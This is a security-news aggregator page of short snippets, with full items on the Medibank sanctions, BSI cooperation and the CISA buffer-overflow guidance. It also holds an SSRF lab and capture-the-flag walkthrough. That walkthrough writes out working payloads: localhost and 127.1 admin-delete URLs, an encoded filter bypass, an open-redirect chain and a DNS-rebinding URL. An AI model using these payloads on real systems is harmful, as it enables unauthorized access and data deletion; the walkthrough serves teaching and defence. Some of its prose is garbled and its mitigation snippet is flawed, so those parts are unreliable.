Talk of backdoors in encrypted services is once again doing the rounds after reports emerged that the U.K. government is seeking to force Apple to open up iCloud’s end-to-end encrypted (E2EE) device backup offering. Officials were said to be leaning on Apple to create a “backdoor” in the service that would allow state actors to […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Plus: Researchers find RedNote lacks basic security measures, surveillance ramps up around the US-Mexico border, and the UK ordering Apple to create an encryption backdoor comes under fire.

by WIRED Security News

The US Cybersecurity and Infrastructure Security Agency has frozen efforts to aid states in securing elections, according to an internal memo viewed by WIRED.

by WIRED Security News

Cybersecurity researchers have disclosed a new type of name confusion attack called whoAMI that allows anyone who publishes an Amazon Machine Image (AMI) with a specific name to gain code execution within the Amazon Web Services (AWS) account. ""If executed at scale, this attack could be used to gain access to thousands of accounts,"" Datadog Security Labs researcher Seth Art said in a report

by The Hacker News

The North Korean threat actor known as the Lazarus Group has been linked to a previously undocumented JavaScript implant named Marstech1 as part of limited targeted attacks against developers. The active operation has been dubbed Marstech Mayhem by SecurityScorecard, with the malware delivered by means of an open-source repository hosted on GitHub that''s associated with a profile named ""

by The Hacker News

MSPs are at the leading edge of providing cybersecurity services. They provide and procure vital perimeter protections to most of their client as part of their service packages.

by Barracuda

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Why You Might Need to Pause or Delay in PowerShell Scripts The Start-Sleep cmdlet in PowerShell pauses the execution of a script and waits for a specified amount of time. Strategically using pauses can help ensure smooth functionality and prevent errors, especially in scripts that depend on external systems or events. Here are three of … Continued

by Netwrix

AttackIQ has released two new attack graphs that emulate the behaviors exhibited by the long-standing, financially motivated Russian criminal adversary known as FIN7 based on activities observed between 2022 and 2023. The post Emulating the Financially Motivated Criminal Adversary FIN7 – Part 2 appeared first on AttackIQ.

by AttackIQ

Credible Security''s founders bring their varied experiences to help growing companies turn trust into a strategic advantage.

by Dark Reading

A cybercriminal stole a reported 12 million data records on Zacks’ customers and clients.

by Malwarebytes Labs

Back in November, we broke the news that Meta — owner of Facebook, Instagram, and WhatsApp, with billions of users accounting for 10% of all fixed and 22% of all mobile traffic — was close to announcing work on a major new, $10 billion+ subsea cable project to connect up the globe. The aim was […] © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed two vulnerabilities in ClearML and four vulnerabilities in Nvidia. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.   For Snort

by Cisco Talos Blog

A newly discovered phishing campaign targeting Microsoft 365 accounts has been attributed to Russian-linked threat actors, leveraging an advanced technique known as device code authentication phishing. Reports from both Microsoft and cybersecurity firm Volexity indicate that multiple groups have been exploiting this method since mid-2024, targeting government agencies, NGOs, defense organizations, and private companies across … The post Hackers Use Device Code Phishing to Hijack Microsoft 365 Accounts appeared first on CyberInsider.

by Cyber Insider

Social engineering is advancing fast, at the speed of generative AI. This is offering bad actors multiple new tools and techniques for researching, scoping, and exploiting organizations. In a recent communication, the FBI pointed out: ‘As technology continues to evolve, so do cybercriminals'' tactics.’ This article explores some of the impacts of this GenAI-fueled acceleration. And examines what

by The Hacker News

A newly uncovered cyber espionage campaign led by the Chinese state-sponsored hacking group Salt Typhoon (Red Mike) has compromised vulnerable Cisco devices worldwide, targeting telecommunications providers across multiple countries, including the United States, the United Kingdom, and South Africa. The attack exploits two critical privilege escalation vulnerabilities, CVE-2023-20198 and CVE-2023-20273, found in Cisco IOS XE … The post Chinese Hackers Breach Cisco Devices in Global Telecom Attacks appeared first on CyberInsider.

by Cyber Insider

Microsoft is calling attention to an emerging threat cluster it calls Storm-2372 that has been attributed to a new set of cyber attacks aimed at a variety of sectors since August 2024. The attacks have targeted government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas

by The Hacker News

The threat actors behind the RansomHub ransomware-as-a-service (RaaS) scheme have been observed leveraging now-patched security flaws in Microsoft Active Directory and the Netlogon protocol to escalate privileges and gain unauthorized access to a victim network''s domain controller as part of their post-compromise strategy. ""RansomHub has targeted over 600 organizations globally, spanning sectors

by The Hacker News

Banking fraud and financial crimes are growing more sophisticated every day. By understanding the threats and building strong collaborations, banks can protect themselves and their clients.

by Dark Reading

Companies pursing internal AI development using models from Hugging Face and other open source repositories need to focus on supply chain security and checking for vulnerabilities.

by Dark Reading

The China-sponsored state espionage group has exploited known, older bugs in Cisco gear for successful cyber intrusions on six continents in the past two months.

by Dark Reading

Data theft extortion attacks increased by 46% in the fourth quarter of 2024, according to a new report from Nuspire.

by KnowBe4

This post first appeared on blog.netwrix.com and was written by Dirk Schrader.If you have ever been to a Las Vegas casino, then you know that they are literally money-making machines as people bet money on a variety of games on a continuous basis. Modern casinos exemplify digitally transformed businesses, with customers engaging through multiple digital channels, from gaming systems to mobile apps and loyalty programs. The … Continued

by Netwrix

The government of Prime Minister Anthony Albanese has imposed additional cyber sanctions in response to a major 2022 cyberattack that hit Medibank Private. The breach, which compromised millions of customers'' sensitive medical data, marked a turning point in Australia’s approach to cyber security. The Medibank Private cyberattack not only targeted the personal information of Medibank’s customers but also saw portions of the stolen data published on the dark web.  The 2022 cyberattack was one of Australia’s largest and most damaging cyber incidents, affecting thousands of individuals who found their personal and health information exposed. The Medibank Private attack was part of a growing trend of cybercriminal activities targeting Australian businesses, government systems, and critical infrastructure. In response, the Australian Government has taken a firm stand by introducing unprecedented cyber sanctions, marking the first time Australia has sanctioned an entity involved in facilitating cyberattacks.  The Medibank Private Cyberattack and New Sanctions The new sanctions specifically target ZServers, a Russian-based network infrastructure provider that played a crucial role in the cyberattack. ZServers, along with five associated Russian cybercriminals, were identified as the perpetrators behind the infrastructure enabling the Medibank Private data breach. These individuals are: ZServers owner Aleksandr Bolshakov, and employees Aleksandr Mishin, Ilya Sidorov, Dmitriy Bolshakov, and Igor Odintsov. The Albanese Government says these actors not only facilitated the Medibank cyberattack but also provided services that supported a range of other malicious cyber activities, including ransomware operations associated with notorious cybercriminal groups like LockBit and BianLian. The sanctions, which have broad implications, make it a criminal offense for individuals or entities to engage with ZServers or its affiliated individuals. Australian law now imposes severe penalties, including imprisonment for up to 10 years and heavy fines, for those found guilty of providing assets or conducting any dealings with these sanctioned entities. Additionally, the sanctions prevent these cybercriminals from entering Australia, further reinforcing the country''s commitment to securing its digital borders. Past Sanctions in Australia This latest round of sanctions follows a similar move earlier in 2024 when Aleksandr Ermakov was sanctioned for his alleged involvement in the Medibank cyberattack. The Albanese Government''s response shows its resolve to deter cybercriminal activity and protect Australians from the devastating impacts of cybercrime. The implementation of the cyber sanctions is the result of extensive collaboration between various Australian agencies, including the Australian Signals Directorate (ASD), as well as international partners like the United States and the United Kingdom. This united front highlights the importance of global cooperation in the fight against cybercrime, with all parties working to identify, disrupt, and hold accountable the actors responsible for the Medibank Private cyberattack and other malicious online activities. Furthermore, these sanctions are a key component of Australia’s broader strategy to strengthen its cyber defenses. The Albanese Government’s 2023-2030 Australian Cyber Security Strategy outlines the nation’s commitment to deterring cyber threats and holding cybercriminals accountable. By using sanctions as a tool, the government is ensuring that malicious cyber actors face serious consequences for their actions.

by The Cyber Express

C and C++ programming are notorious for being bug-prone. Let’s look at the most dangerous software weaknesses in 2024 that are relevant for C and C++, so that you know what type of issues to test your code against in 2025.

by Code Intelligence

Police disrupt Phobos, 8Base and LockBit, Sarcoma ransomware targets PCB giant, and China-linked APTs use espionage tools in ransomware attacks. The post The Good, the Bad and the Ugly in Cybersecurity – Week 7 appeared first on SentinelOne.

by SentinelOne

The Linux kernel can produce a hung task warning. Searching the Internet and the kernel docs, you can find a brief explanation that the process is stuck in the uninterruptible state.

by Cloudflare

Romance-baiting losses were up 40% last year, as more and more pig-butchering efforts crop up in the wild.

by Dark Reading

It’s easy to focus on technology when talking about cybersecurity. However, the best prevention measures rely on the education of those who use technology. Organizations training their employees is the first step. But the industry needs to expand the concept of a culture of cybersecurity and take it from where it currently stands as an […] The post 4 ways to bring cybersecurity into your community appeared first on Security Intelligence.

by Security Intelligence

This week marks Valentine’s Day 2025! As the popularity of this romantic occasion has grown, so too have the cyber risks associated with dating, gift-giving, and online transactions. We have gathered insights from cybersecurity experts who share their thoughts on Valentine’s Day scams—from the threats facing love-struck consumers to the best practices for staying safe […] The post Swipe Left on Scams: Cyber Experts Expose Valentine’s Day Fraudsters appeared first on IT Security Guru.

by IT Security Guru

Assessing resource savings and productivity gains with systematic implementation of secure container development and IT transformation in hybrid clouds.

by Kaspersky

Introduction: The Silent Threat Lurking in Your Web Applications Imagine a vulnerability that allows attackers to reach into your internal network, access sensitive data, or even delete critical resources—all by simply manipulating a URL. This isn’t science fiction; it’s Server-Side Request Forgery (SSRF), one of the most underrated yet dangerous vulnerabilities in modern web applications. SSRF attacks exploit trust relationships between servers, turning benign features like stock checkers or screenshot tools into weapons for attackers. In this blog, we’ll dissect SSRF through hands-on labs and a real-world challenge, uncovering techniques like DNS rebinding, blacklist bypasses, and open redirect hijacking. Whether you’re a bug bounty hunter, developer, or security enthusiast, you’ll walk away with actionable insights to exploit—and defend against—these stealthy attacks. Blackbox Testing Lab 1: Basic SSRF against the local server 🔗 Lab URL - https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost After accessing the labs, after few clicks, we see an option called check stocks. Now unlike other requests in the web-site, this seems to be interesting request as it’s a POST request. Looking at the request we see stockApi parameter, that accepts an URL. Now what if we can change the URL to fetch some internal resource Well in that case this website is vulnerable to SSRF. Let’s try it out Click on any URL like this and click on check stock and you see POST request sent to the server. Take a look on the burpsuite. https://0a2500c90385725e849b7c4a00ad000c.web-security-academy.net/product?productId=1 If we change the stock API to the following options we get the access to admin panel. http://localhost http://127.0.0.1 Now let’s go ahead an access /admin and we see if we check on pretty view option in the response, then we see exact path for deleting the carlos user. http://localhost/admin http://127.0.0.1/admin Visiting the endpoint we delete the user. http://localhost/admin/delete?username=carlos http://127.0.0.1/admin/delete?username=carlos Now click on follow redirectionand once the request has been sent then we would have successfully solved the lab. Lab 2: Basic SSRF against another back-end system 🔗 Lab URL - https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system Now we are given an internal IP address of 192.168.0.1 and port number 8080. Now we can either fuzz for other ports, but here in the lab description we are asked to check for the last octet so grab a number list from 1 to 255 and fuzz the last octet on the intruder. Once we have started fuzzing, we see that last octet with value 82 returns 404 response, but despite the error, we are able to access /admin pannel. Now let’s fire our repeater and access http://192.168.0.82:8080/admin. We are able to access the admin panel. Now let’s repeat steps from the previous labs, click on pretty, grab the link to delete the carlos user, and with this we solve the lab. http://192.168.0.82:8080/admin/delete?username=carlos If we access the above endpoint, we solve the lab. Just like the previous lab we get an redirect and on following the redirection we solve the lab. Lab 3: SSRF with blacklist-based input filter 🔗 Lab URL - https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter In this lab we start off with similar note, just like previous ones, and we see the post request with stock options and we see stock API. We see that localhost and 127.0.0.1 are black listed. Now we can evade these basic filters with addresses like: http://127.1/ http://2130706433/ The last one is the decimal representation of the IPv4 address. You can visit websites like https://www.ipaddressguide.com/ip to convert an IP address to decimial. Notice that in CTFS the second one should work but in our lab it does not work. So we go ahead with http://127.1 and we get access to admin panel. If we try and access http://127.1/admin we see an option to delete the carlos user, just click on pretty and grab the href link. If things were that simple then we there would not be fun right? we see that /admin is an blacklisted character, so in the word admin if we can double URL encode the character we get %25%36%31 and we use this character to bypass the restriction. We grab the link to delete the carlos user and now the final payload for accessing internal resource would look something like the following. http://127.1/%25%36%31dmin/delete?username=carlos On changing the stockapi to the above URL we get an redirection and with this we are able to solve the lab. Lab 4: SSRF with filter bypass via open redirection vulnerability 🔗 Lab URL - https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection In this lab we see an option to view the next product at the end of each page, and once we click we see the following GET request made. /product/nextProduct?currentProductId=2&path=/product?productId=3 Notice the &path and we see that if we replace it with any URL this end point is vulnerable to open redirect vulnerability. Now the above endpoint makes an 302 request or redirect and if we follow along we reach this endpoint. /product?productId=3 Let’s take this parameter and then join this parameter inside the stock API parameter and let’s try and access the admin dashboard. Notice the /product?productID from redirect and the &path from above request? let’s fuse both requests together and make an new parameter in stockAPI. stockApi=/product?productId=3&path=http://192.168.0.12:8080/admin/ Visiting this endpoint, from the response section if we look at the source code then we see link for deleting the carlos user which is as follows. /http://192.168.0.12:8080/admin/delete?username=carlos Now the final payload for the stockApi would look something like the below following. stockApi=/product?productId=3&path=http://192.168.0.12:8080/admin/delete?username=carlos With this we should solve the lab. This was really an out of box situation, which forced me to understand how we can tamper the view next page option to get what we want. This lab opened door to crafting new http parameters and coming up with innovative ways to approach solving this lab. Whitebox Testing 🔗 Lab URL - https://app.hackthebox.com/challenges/baby%2520CachedView Baby Cached Web Below is a revised version of your “Baby Cached Web” section with updated code snippets and explanations that reflect the easy challenge’s source code. This version also includes an engaging introduction and conclusion to improve the overall flow. Overview of the Challenge In this challenge, we examine a Flask web application with two main endpoints: /cache: Accepts a URL via a JSON POST request, loads the page using a headless browser (Selenium with Firefox), takes a screenshot, and caches the image. /flag: Returns a secret flag image but is strictly accessible only from localhost. At first glance, the application seems secure because it enforces the following checks (as seen in CachedWeb/web_cached_web/challenge/application/util.py) URL Scheme Check The code ensures that only URLs with http or https schemes are allowed. if scheme not in [''http'', ''https'']: return flash(''Invalid scheme'', ''danger'') Internal IP Check When processing the request the application first uses socket.gethostbyname to resolve the domain then confirms the obtained IP address does not belong to internal ranges starting with 127.0.0.0/8 and 10.0.0.0/8. def ip2long(ip_addr): return struct.unpack(''!L'', socket.inet_aton(ip_addr))[0] def is_inner_ipaddress(ip): ip = ip2long(ip) return ip2long(''127.0.0.0'') >> 24 == ip >> 24 or \ ip2long(''10.0.0.0'') >> 24 == ip >> 24 or \ ip2long(''172.16.0.0'') >> 20 == ip >> 20 or \ ip2long(''192.168.0.0'') >> 16 == ip >> 16 or \ ip2long(''0.0.0.0'') >> 24 == ip >> 24 if is_inner_ipaddress(socket.gethostbyname(domain)): return flash(''IP not allowed'', ''danger'') Localhost Protection for /flag A decorator in util.py ensures that only requests originating from 127.0.0.1 and without a referrer can access the /flag endpoint. def is_from_localhost(func): @functools.wraps(func) def check_ip(*args, **kwargs): if request.remote_addr != ''127.0.0.1'' or request.referrer: return abort(403) return func(*args, **kwargs) return check_ip The route then uses this decorator. This can be found inside CachedWeb/web_cached_web/challenge/application/blueprints/routes.py @web.route(''/flag'') @is_from_localhost def flag(): return send_file(''flag.png'') The Vulnerability: DNS Rebinding + TOCTOU The image from the source code reveals us a major hints on what this application might be vulnerable to. The application suffers from a DNS rebinding attack and a acrid Time-of-Check to Time-of-Use (TOCTOU) race condition despite its security safeguards. Here’s why: Initial DNS Resolution Check The cache_web function employs socket.gethostbyname(domain) to find the domain resolution while ensuring no internal IP addresses remain pointed to it. The DNS check happens once when the URL is still in possession of the system prior to Selenium receiving it. Separate DNS Resolution by Selenium The browser runs separate DNS queries when the instruction driver.get(url) activates in the serve_screenshot_from function. Attackers who exploit DNS rebinding can fool the first IP address check of Selenium even though they redirect domain resolution later to 127.0.0.1 and internal network addresses. TOCTOU Window The period between the DNS check at time-of-check and the actual browser request at time-of-use allows attackers to create a race condition. The window between discussions allows hackers to modify DNS records and send traffic to a server at 127.0.0.1 or internal endpoint /flag. DNS Rebinding Explained (in Simple Terms): DNS Rebinding: A website obtains deception through altering its IP address after initial computer acceptance. Runtime security platforms recognize DNS rebinding as a technique explained by Wikipedia to circumvent the same-origin policy through unexpected domain IP address resolution by browsers. TOCTOU Race Condition Explained: TOCTOU (Time-of-Check to Time-of-Use): Such condition arises when testing a status requires a noticeable duration before applying its results. The system operates on outdated or manipulated data since a change occurs within the defined interval such as a DNS response. When checking door locks to leave a space remains it would be helpful to confirm security status first. Your assumption about security becomes invalid when the locking condition changes between your check and someone else accessing the lock. DNS changes between when the browser conducts checks and makes its request provide the attacker with a potential period of access. Exploitation Steps: Craft a Malicious URL: The attacker conducts the IP check with a DNS rebinding service that points to an initially safe IP address but this service later redirects to 127.0.0.1 just before Selenium executes the URL. Bypass the IP Check: The DNS lookup operated from cache_web takes place at a time when it fails to detect the IP address change because of which the IP check successfully finishes. Trigger the TOCTOU Vulnerability: An internal target becomes the domain resolution point after Selenium completes its domain retrieval process. Through this method the attacker achieves access to the protected endpoint that resides at /flag. Getting the flag We will first find the google’s IP address to rebind the local host address. We can use the nslookup command to find google’s IP address ❯ nslookup google.com Server:         127.0.0.53 Address:        127.0.0.53#53 Non-authoritative answer: Name:   google.com Address: 142.250.195.110 Name:   google.com Address: 2404:6800:4007:81b::200e Now we will use a website like https://lock.cmpxchg8b.com/rebinder.html to perform rebinding attack. Copy the address and paste it in the input box several times till we trigger the race condition and get the flag. Ideally 3 times should be enough but keep doing until we get the flag http://7f000001.8efac36e.rbndr.us/flag The Baby Cached Web challenge illustrates how even seemingly robust SSRF defenses can be undermined through DNS rebinding and TOCTOU race conditions. By exploiting the gap between the initial DNS check and the subsequent browser request, an attacker can manipulate the DNS resolution to access internal endpoints intended to be protected—like retrieving the secret flag image. This challenge serves as a powerful reminder that security measures must consider dynamic network behaviors, not just static input validation Final Words: Turning Knowledge Into Defense SSRF isn’t just a vulnerability—it’s a gateway to your internal infrastructure. From bypassing blacklists with 127.1 to weaponizing DNS rebinding, we’ve seen how attackers pivot from simple URL parameters to full-scale breaches. Key Takeaways: Always validate and sanitize user-supplied URLs. Assume localhost restrictions can be bypassed; enforce strict allowlists. Monitor DNS resolution gaps in TOCTOU-prone workflows. To mitigate against these attacks feel free to refer these reference links to understand and to defend better against SSRF attacks # How to prevent SSRF Attacks in Node.js [](https://www.youtube.com/@Snyksec) # What functionalities are vulnerable to SSRFs? Case study of 124 bug bounty reports [](https://www.youtube.com/@BugBountyReportsExplained) https://medium.com/@ajay.monga73/defending-against-ssrf-understanding-detecting-and-mitigating-server-side-request-forgery-f2d1fd62413d [Has some good java code snippets] To sum up here are some of the defences you can start implementing in your web application to stay protected against attacks like SSRF. Input Validation & Sanitization Users must submit valid URLs through the schema validation library Zod to maintain proper check parameters. The validation schema features one requirement for strings that need to adopt valid URL properties and restrict access to HTTPS protocol usage. The system should block all inputs that do not conform to valid URL structures or permitted schemas including file:// and ftp://. Implementation: const urlSchema = z.string().url().startsWith(""https://""); try { urlSchema.parse(userInput); } catch (e) { blockRequest(); } The parsing system enables Zod to detect invalid input through structured error reporting so that it prevents SSRF attacks by authorizing sanitized URLs with valid protocols. Enforce URL Schemas The Zod function startsWith(""https://"") enables HTTPS protocol protection to block all domains lacking HTTPS prefixes. The measure prevents security risks from internal protocol handlers that could enable them to access local files through commands (such as file://). The system should reject URLs containing encoded characters like %0D%0A for CRLF injection through regulation patterns and normalization techniques. Domain Allowlisting The implementation phase should use a fixed list of trusted domains which includes the entry ""api.unsplash.com"". A security check involving URL.hostname extraction with strict comparison should validate all URLs against the list of trusted domains. Code Example: const userHost = new URL(userInput).hostname; if (!trustedDomains.includes(userHost)) throw Error(""Untrusted domain""); Such security controls require connectivity to configuration management systems including Consul or databases to maintain optimal lookups for dynamic address registration. Web Application Firewalls (WAF) Cloud-based WAFs including AWS WAF or Cloudflare should monitor and block requests directed to internal IP ranges (RFC 1918) and loopback addresses (127.0.0.1 and AWS/GCP metadata endpoints (169.254.169.254). Rulesets: A. The WAF system should block all requests that have a Host header which resolves to any internal IP address. B. WAF systems should detect unauthorized SSRF patterns that appear as localhost or admin.internal. C. Can limit the number of URL requests to prevent scanning activities through endpoint rates. Dependency Management The implementation of Snyk or Dependabot as tools for automating vulnerability scans should be integrated. The system must detect outdated is-url versions that contain ReDoS vulnerabilities and automatically force upgrades to new versions. Pipeline Integration: # CI/CD step snyk test && snyk monitor Audit libraries that manage network operations need evaluation to prevent default settings such as following redirected connections which pose risks to third-parties. TOCTOU Mitigation The DNS Rebinding defense resolves the domain to an IP during validation after which the same IP can be reused for subsequent requests. The server should store obtained IP addresses in temporary cache to defend against attackers who could change DNS records after validation completion. Code Snippet: const resolvedIP = dns.resolve(userHost); if (isInternalIP(resolvedIP)) blockRequest(); // Use resolvedIP for the actual fetch, not the user-provided URL fetch(`https://${resolvedIP}/path`) Network Hardening The application server should not reach backend services such as databases or metadata APIs which must reside within separate private subnets. Egress Controls: Restrict outbound traffic from the Node.js process to only necessary domains/IPs via firewall rules (e.g., iptables, cloud security groups). Ready to test your skills? Test the laboratories by hand and do not underestimate the defensive power of paranoia during your SSRF defenses. You should combine curiosity with ethical breakage of systems while building multiple security layers to protect yourself.

by HACKLIDO

BSI Expands Cybersecurity Cooperation with Hamburg  Germany continues to strengthen its cybersecurity framework as the Federal Office for Information Security (BSI) and the Free and Hanseatic City of Hamburg formalize their collaboration. The agreement, signed on February 7, at Hamburg City Hall, establishes a structured approach to cyber threat intelligence sharing, incident response coordination, and awareness initiatives for public sector employees.  BSI Vice President Dr. Gerhard Schabhüser called for the urgency of strengthening cybersecurity across federal and state levels:  “In view of the worrying threat situation in cyberspace, Germany must become a cyber nation. State administrations and municipal institutions face cyberattacks daily. Attacks on critical infrastructure threaten social order. Germany is a target of cyber sabotage and espionage. Our goal is to enhance cybersecurity nationwide. To achieve this, we must collaborate at both federal and state levels.”  This partnership is part of a broader federal initiative, with BSI having previously signed cooperation agreements with Saxony, Saxony-Anhalt, Lower Saxony, Hesse, Bremen, Rhineland-Palatinate, and Saarland. These agreements provide a constitutional framework for joint cyber defense efforts, strategic advisory services, and rapid response measures following cyber incidents.  With cyber threats growing in complexity, state-level cooperation plays a vital role in reinforcing Germany’s cybersecurity resilience, ensuring government agencies, public sector institutions, and critical infrastructure operators have the necessary tools and expertise to prevent, detect, and mitigate cyber threats effectively.  Addressing Digital Violence  Days later, on February 11, BSI hosted “BSI in Dialogue: Cybersecurity and Digital Violence” in Berlin, bringing together representatives from politics, industry, academia, and civil society to address the growing risks associated with digital violence in an increasingly interconnected world.  While cybercriminals typically operate remotely, digital violence introduces a new layer of cyber threats, where attackers exploit personal relationships, home technologies, and social connections to manipulate, monitor, or harm individuals. This includes:  Unauthorized access to smart home devices for spying, stalking, or harassment.  Misuse of digital vulnerabilities to monitor victims or leak personal data.  Exploitation of location tracking features to stalk or control individuals.  The event initiated several working groups to develop strategic responses to digital violence and was mainly focused on:  Defining Digital Violence  International research has varied definitions of digital violence, making it difficult to establish a legal and policy framework in Germany.  Experts emphasized the need for a standardized definition to develop measurement tools and track digital violence cases more effectively.  Technical Support for Victims  The WEISSER RING initiative presented concepts for a technical contact point to assist victims.  Discussions concluded that victims and advisors need greater technical expertise to counter digital violence effectively.  Corporate Responsibility  Businesses were encouraged to implement protective policies for employees and integrate security-by-design principles in their products to prevent misuse.  Manufacturers and service providers must take accountability for securing digital products against exploitation.  Empowerment Through Cybersecurity Education  Widespread digital literacy programs can help individuals identify and mitigate digital threats.  BSI-led initiatives will focus on consumer awareness, IT security training, and response strategies for digital violence victims.  Schabhüser pressed on the human aspect of cybersecurity during the meet:  “People can only move safely in a digitalized environment if they recognize the opportunities and risks of digital technologies and can overcome challenges through their own actions.”  BSI’s dual efforts in federal-state cybersecurity collaboration and digital violence prevention reflect Germany’s proactive stance against emerging cyber threats. As cybercriminals adapt and evolve their tactics, both government agencies and individual users must be equipped with the necessary knowledge, tools, and policies to fortify digital resilience.  Conclusion  Through structured cooperation, regulatory frameworks, and public awareness programs, BSI aims to build a secure and cyber-resilient society, ensuring state institutions, businesses, and individuals can operate safely in an increasingly digital world.  References:  https://www.bsi.bund.de/DE/Service-Navi/Presse/Pressemitteilungen/Presse2025/250211_Kooperationsvereinbarung_Hamburg.html  https://www.bsi.bund.de/DE/Service-Navi/Presse/Alle-Meldungen-News/Meldungen/BSI_Dialog_Cybersicherheit-digitale-Gewalt.html  The post Germany is Strengthening Cybersecurity with Federal-State Collaboration and Digital Violence Prevention  appeared first on Cyble.

by CYBLE

This guide explores advanced hardening techniques, including MAC frameworks, network security enhancements, proactive vulnerability management, container security, and the use of AI for threat detection.

by ITPro Today

Qilin is a ransomware group that emerged in July 2022 and operates under a Ransomware‑as‑a‑Service (RaaS) model. The group quickly gained notoriety following its high‑profile $50 million ransom demand during an assault on Synnovis—a leading pathology services provider—which resulted in significant disruptions across key NHS hospitals in London. Originally an offshoot of the Agenda ransomware (developed in Go), Qilin has evolved into a more robust, Rust‑based variant that incorporates advanced techniques in malware construction and evasion.

by Picus Security

I''m doing a quick poll because I find myself exactly where Sam is. But I would love to understand how that is for us IT pros here. Hence.. a POLL I am hosting at LinkedIn. Deadline is a week from today, Feb 14, 2025.  PS: What I mean with ""Google searches"" is the old-style type words in the box and get blue links, not the new Google AI ""zero click"" UI that some people get these days...   :-D

by KnowBe4

With cyber breaches reaching record highs in 2024, businesses face increasingly sophisticated threats in 2025 — emphasizing the need for proactive cybersecurity strategies.

by ITPro Today

Threat actors who were behind the exploitation of a zero-day vulnerability in BeyondTrust Privileged Remote Access (PRA) and Remote Support (RS) products in December 2024 likely also exploited a previously unknown SQL injection flaw in PostgreSQL, according to findings from Rapid7. The vulnerability, tracked as CVE-2025-1094 (CVSS score: 8.1), affects the PostgreSQL interactive tool psql. ""An

by The Hacker News

In a strongly worded advisory, the FBI and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) have urged software developers to cease unsafe development practices that lead to “unforgivable” buffer overflow vulnerabilities.  “Despite the existence of well-documented, effective mitigations for buffer overflow vulnerabilities, many manufacturers continue to use unsafe software development practices that allow these vulnerabilities to persist,” the agencies said in the February 12 Secure By Design alert. “For these reasons—as well as the damage exploitation of these defects can cause—CISA, FBI, and others designate buffer overflow vulnerabilities as unforgivable defects.”  The agencies said threat actors leverage buffer overflow vulnerabilities to gain initial access to networks, thus making them a critical point for preventing attacks.  We’ll look at the prevalence of buffer overflow vulnerabilities, some examples cited by CISA and the FBI, and guidance for secure development and use of memory-safe programming languages.  Buffer Overflow Vulnerabilities: Prevalence and Examples  The FBI-CISA guidance specifically mentions the common software weaknesses CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer), along with stack-based buffer overflows (CWE-121) and heap-based buffer overflows (CWE-122).  The phrase “buffer overflow” occurs in 67 of the 1270 vulnerabilities in CISA’s Known Exploited Vulnerabilities (KEV) catalog, or 5.28% of the KEV database. The words “buffer” and “overflow” occur in 84 of the KEV vulnerabilities (6.6%).  CISA and the FBI cited six examples of buffer overflow vulnerabilities in IT products:  CVE-2025-21333, a Windows Hyper-V NT Kernel Integration VSP Elevation of Privilege vulnerability  CVE-2025-0282, a stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3  CVE-2024-49138, a Windows Common Log File System Driver Elevation of Privilege vulnerability  CVE-2024-38812, a VMware vCenter Server heap-overflow vulnerability  CVE-2023-6549, an Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Citrix Systems’ NetScaler ADC and NetScaler Gateway  CVE-2022-0185, a heap-based buffer overflow flaw in the way the legacy_parse_param function in the Filesystem Context functionality of the Linux kernel verified the supplied parameters length (the CWE in this case was CWE-190, Integer Overflow or Wraparound).  “These vulnerabilities can lead to data corruption, sensitive data exposure, program crashes, and unauthorized code execution,” the agency guidance said. “Threat actors frequently exploit these vulnerabilities to gain initial access to an organization’s network and then move laterally to the wider network.”  They added that “the use of unsafe software development practices that allow the persistence of buffer overflow vulnerabilities—especially the use of memory-unsafe programming languages—poses unacceptable risk to our national and economic security.”  Memory-Safe Software Development  The agencies urged manufacturers “to take immediate action to prevent these vulnerabilities from being introduced into their products. ... Software manufacturer senior executives and business leaders should ask their product and development teams to document past buffer overflow vulnerabilities and how they are working to eliminate this class of defect.”  Customers should hold manufacturers accountable by requesting a Software Bill of Materials (SBOM) and a secure software development attestation, the FBI and CISA said.  For development teams, the agencies recommended the following secure by design practices to prevent buffer overflow vulnerabilities:  Memory-safe languages should be used whenever possible “to shift the burden of memory management from the developer to the programming language’s built-in safety features.” They added that developers should never disable or override memory safety guarantees in languages when it’s possible to do so, and that using a memory-safe language in one part of a software package will not fix memory-unsafe code in other libraries.  A phased transition plan for implementing memory-safe languages should be used for upgrading existing codebases while using technologies to limit memory vulnerabilities in existing code. “Ideally, this plan should include using memory-safe languages to develop new code and—over time and when feasible—transition their software’s most highly privileged/exposed code to memory-safe languages,” the agencies said.  Enable compiler flags that implement compile time and runtime protections against buffer overflows to the extent that application performance allows, and “implement canaries that alert if an overflow occurs.”  Conduct unit tests with an instrumented toolchain such as AddressSanitizer and MemorySanitizer that checks source code for buffer overflows and other memory safety issues.  Perform adversarial product testing that includes static analysis, fuzzing, and manual reviews to ensure code safety and quality throughout the development lifecycle.  Publish a memory-safety roadmap that outlines plans to develop new products with memory-safe languages and to migrate older ones based on risk.  Conduct root cause analysis of past vulnerabilities, including buffer overflows, to identify patterns. “Where possible, take actions to eliminate entire classes of vulnerabilities across products, rather than the superficial causes,” the agencies said.  The alert said eliminating buffer overflow vulnerabilities “can help reduce the prevalence of other memory safety issues, such as format string, off-by-one, and use-after-free vulnerabilities.”  Conclusion  As an initial entry point for attackers into a network, the importance of buffer overflow vulnerability prevention can’t be overstated. Development teams would be wise to implement CISA and the FBI’s advice to the maximum extent possible.  Customers also have a role to play by demanding memory-safe documentation from suppliers. But they also shouldn’t neglect basic cybersecurity practices for the eventual vulnerabilities that will slip past even the most vigilant development teams. Zero trust, risk-based vulnerability management, segmentation, tamper-proof backups and network and endpoint monitoring are all critically important practices for limiting the damage from any cyberattacks that do occur.  The post FBI, CISA Urge Memory-Safe Practices for Software Development  appeared first on Cyble.

by CYBLE

